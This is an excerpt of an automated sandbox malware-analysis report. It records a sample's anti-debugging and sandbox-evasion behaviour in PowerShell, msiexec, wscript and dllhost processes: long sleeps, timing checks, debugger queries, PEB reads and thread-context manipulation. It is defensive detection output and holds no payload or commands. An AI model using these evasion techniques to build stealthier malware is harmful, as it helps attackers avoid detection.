Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0387D1C0 rdtsc 11_2_0387D1C0
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5808 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4055 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6436 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3338 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\dllhost.exe API coverage: 2.1 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2368 Thread sleep time: -10145709240540247s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5308 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: msiexec.exe, 00000008.00000002.2785546396.0000000004C78000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
Source: dllhost.exe, 0000000B.00000002.2965414846.0000000003282000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
Source: msiexec.exe, 00000008.00000003.2294292940.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2785751974.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687921782.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.1943817554.0000024B3E4C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWI
Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966014454.0000000000A6F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: msiexec.exe, 00000008.00000003.2294292940.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2785751974.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687921782.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\dllhost.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0387D1C0 rdtsc 11_2_0387D1C0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03844340 NtSetContextThread,LdrInitializeThunk, 11_2_03844340
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382438F mov eax, dword ptr fs:[00000030h] 11_2_0382438F
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382438F mov eax, dword ptr fs:[00000030h] 11_2_0382438F
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D539D mov eax, dword ptr fs:[00000030h] 11_2_038D539D
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0385739A mov eax, dword ptr fs:[00000030h] 11_2_0385739A
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0385739A mov eax, dword ptr fs:[00000030h] 11_2_0385739A
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038333A0 mov eax, dword ptr fs:[00000030h] 11_2_038333A0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038333A0 mov eax, dword ptr fs:[00000030h] 11_2_038333A0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038233A5 mov eax, dword ptr fs:[00000030h] 11_2_038233A5
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037F9353 mov eax, dword ptr fs:[00000030h] 11_2_037F9353
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037F9353 mov eax, dword ptr fs:[00000030h] 11_2_037F9353
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FD34C mov eax, dword ptr fs:[00000030h] 11_2_037FD34C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FD34C mov eax, dword ptr fs:[00000030h] 11_2_037FD34C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380A3C0 mov eax, dword ptr fs:[00000030h] 11_2_0380A3C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380A3C0 mov eax, dword ptr fs:[00000030h] 11_2_0380A3C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380A3C0 mov eax, dword ptr fs:[00000030h] 11_2_0380A3C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380A3C0 mov eax, dword ptr fs:[00000030h] 11_2_0380A3C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380A3C0 mov eax, dword ptr fs:[00000030h] 11_2_0380A3C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380A3C0 mov eax, dword ptr fs:[00000030h] 11_2_0380A3C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038083C0 mov eax, dword ptr fs:[00000030h] 11_2_038083C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038083C0 mov eax, dword ptr fs:[00000030h] 11_2_038083C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038083C0 mov eax, dword ptr fs:[00000030h] 11_2_038083C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038083C0 mov eax, dword ptr fs:[00000030h] 11_2_038083C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038BC3CD mov eax, dword ptr fs:[00000030h] 11_2_038BC3CD
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038863C0 mov eax, dword ptr fs:[00000030h] 11_2_038863C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037F7330 mov eax, dword ptr fs:[00000030h] 11_2_037F7330
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038BB3D0 mov ecx, dword ptr fs:[00000030h] 11_2_038BB3D0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038103E9 mov eax, dword ptr fs:[00000030h] 11_2_038103E9
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038103E9 mov eax, dword ptr fs:[00000030h] 11_2_038103E9
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038103E9 mov eax, dword ptr fs:[00000030h] 11_2_038103E9
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038103E9 mov eax, dword ptr fs:[00000030h] 11_2_038103E9
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038103E9 mov eax, dword ptr fs:[00000030h] 11_2_038103E9
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038103E9 mov eax, dword ptr fs:[00000030h] 11_2_038103E9
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038103E9 mov eax, dword ptr fs:[00000030h] 11_2_038103E9
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038103E9 mov eax, dword ptr fs:[00000030h] 11_2_038103E9
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038BF3E6 mov eax, dword ptr fs:[00000030h] 11_2_038BF3E6
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FC310 mov ecx, dword ptr fs:[00000030h] 11_2_037FC310
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D53FC mov eax, dword ptr fs:[00000030h] 11_2_038D53FC
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381E3F0 mov eax, dword ptr fs:[00000030h] 11_2_0381E3F0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381E3F0 mov eax, dword ptr fs:[00000030h] 11_2_0381E3F0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381E3F0 mov eax, dword ptr fs:[00000030h] 11_2_0381E3F0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038363FF mov eax, dword ptr fs:[00000030h] 11_2_038363FF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388930B mov eax, dword ptr fs:[00000030h] 11_2_0388930B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388930B mov eax, dword ptr fs:[00000030h] 11_2_0388930B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388930B mov eax, dword ptr fs:[00000030h] 11_2_0388930B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383A30B mov eax, dword ptr fs:[00000030h] 11_2_0383A30B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383A30B mov eax, dword ptr fs:[00000030h] 11_2_0383A30B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383A30B mov eax, dword ptr fs:[00000030h] 11_2_0383A30B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03820310 mov ecx, dword ptr fs:[00000030h] 11_2_03820310
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C132D mov eax, dword ptr fs:[00000030h] 11_2_038C132D
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C132D mov eax, dword ptr fs:[00000030h] 11_2_038C132D
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382F32A mov eax, dword ptr fs:[00000030h] 11_2_0382F32A
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03882349 mov eax, dword ptr fs:[00000030h] 11_2_03882349
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03882349 mov eax, dword ptr fs:[00000030h] 11_2_03882349
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03882349 mov eax, dword ptr fs:[00000030h] 11_2_03882349
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03882349 mov eax, dword ptr fs:[00000030h] 11_2_03882349
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03882349 mov eax, dword ptr fs:[00000030h] 11_2_03882349
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03882349 mov eax, dword ptr fs:[00000030h] 11_2_03882349
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03882349 mov eax, dword ptr fs:[00000030h] 11_2_03882349
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03882349 mov eax, dword ptr fs:[00000030h] 11_2_03882349
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03882349 mov eax, dword ptr fs:[00000030h] 11_2_03882349
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03882349 mov eax, dword ptr fs:[00000030h] 11_2_03882349
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03882349 mov eax, dword ptr fs:[00000030h] 11_2_03882349
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03882349 mov eax, dword ptr fs:[00000030h] 11_2_03882349
